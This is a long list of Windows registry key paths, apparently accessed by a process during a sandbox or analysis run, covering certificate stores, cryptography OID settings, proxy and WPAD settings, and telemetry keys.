HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.67.1.2!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DiagMatchAnyMask
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\ChainEngine\Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableMandatoryBasicConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableCANameConstraints
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\DisableUnsupportedCriticalExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlCountInCert
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCountPerChain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalByteCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\MaxAIAUrlRetrievalCertCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\CryptnetPreFetchTriggerPeriodSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableWeakSignatureFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\ChainCacheResyncFiletime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllOpenStoreProv
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\My\Keys
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\CTLs
HKEY_CURRENT_USER\
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\109F1CAED645BB78B3EA2B94C0697C740733031C\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D559A586669B08F46A30A133F8A9ED3D038E2EA8\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs\A377D1B1C0538833035211F4083D00FECC414DAB\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\CA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPublisher\Safer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Disallowed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\TrustedPeople
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\trust\CTLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust\PhysicalStores
HKEY_LOCAL_MACHINE\Software\Microsoft\EnterpriseCertificates\trust
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CRLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates\Trust\CTLs
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Diagnostics
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates
HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\UrlDllGetObjectUrl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\AuthRoot
HKEY_LOCAL_MACHINE\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllImportPublicKeyInfoEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllConvertPublicKeyInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Escalation
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\WMR
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\Software\Microsoft\Ole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-0c-29-dc-04-c0
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllVerifyEncodedSignature
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllVerifyEncodedSignature
